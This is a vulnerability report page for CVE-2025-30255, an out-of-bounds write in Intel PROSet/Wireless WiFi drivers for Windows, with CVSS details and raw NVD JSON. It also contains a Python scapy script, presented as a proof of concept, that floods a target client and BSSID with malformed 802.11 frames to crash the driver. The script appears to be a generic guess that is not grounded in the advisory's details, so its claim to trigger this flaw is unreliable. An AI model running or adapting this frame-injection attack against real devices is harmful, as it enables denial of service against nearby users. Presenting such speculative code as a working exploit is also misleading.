Security Vulnerability Report
CVE-2025-30255 CVSS 8.2 HIGH

CVE-2025-30255

Published: 2025-11-11 17:15:47
Last Modified: 2026-04-15 00:35:42

Description

Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Intel PROSet/Wireless WiFi Software for Windows < 23.160

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-30255 PoC - Intel WiFi Driver Out-of-Bounds Write
# This PoC demonstrates sending malformed 802.11 frames to trigger OOB write
# Note: Requires proper wireless card in monitor mode and injection capabilities

import struct
from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11ProbeResp, Dot11Elt, sendp


def create_malformed_frame(bssid, client_mac, seq_num):
    """
    Create a malformed 802.11 frame to trigger OOB write in Intel WiFi driver
    """
    # Craft RadioTap header with abnormal length field
    radio = RadioTap(len=0xFFFF)  # Abnormal length to trigger boundary issue

    # Craft 802.11 frame with malformed information elements
    dot11 = Dot11(
        type=2,  # Data frame
        subtype=0,
        addr1=client_mac,
        addr2=bssid,
        addr3=bssid,
        SC=seq_num
    )

    # Malformed Information Element with invalid length
    ie_data = struct.pack('BB', 0xDD, 0xFF) + b'\x00' * 255
    elt = Dot11Elt(ID=221, info=ie_data)

    # Construct malformed frame
    frame = radio / dot11 / elt
    return frame


def exploit_cve_2025_30255(interface, target_bssid, target_client):
    """
    Send malformed frames to trigger OOB write vulnerability
    """
    print(f"[*] Starting CVE-2025-30255 exploitation on {interface}")
    print(f"[*] Target BSSID: {target_bssid}")
    print(f"[*] Target Client: {target_client}")

    seq = 0
    for i in range(100):
        # Send malformed frames with varying sequence numbers
        frame = create_malformed_frame(target_bssid, target_client, seq)
        sendp(frame, iface=interface, verbose=0)
        seq = (seq + 1) % 4096

        if i % 10 == 0:
            print(f"[*] Sent {i} malformed frames...")

    print("[+] Frame transmission complete")
    print("[!] System may experience BSOD or WiFi service disruption")


if __name__ == "__main__":
    INTERFACE = "wlan0mon"
    TARGET_BSSID = "AA:BB:CC:DD:EE:FF"
    TARGET_CLIENT = "11:22:33:44:55:66"
    exploit_cve_2025_30255(INTERFACE, TARGET_BSSID, TARGET_CLIENT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30255", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:46.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}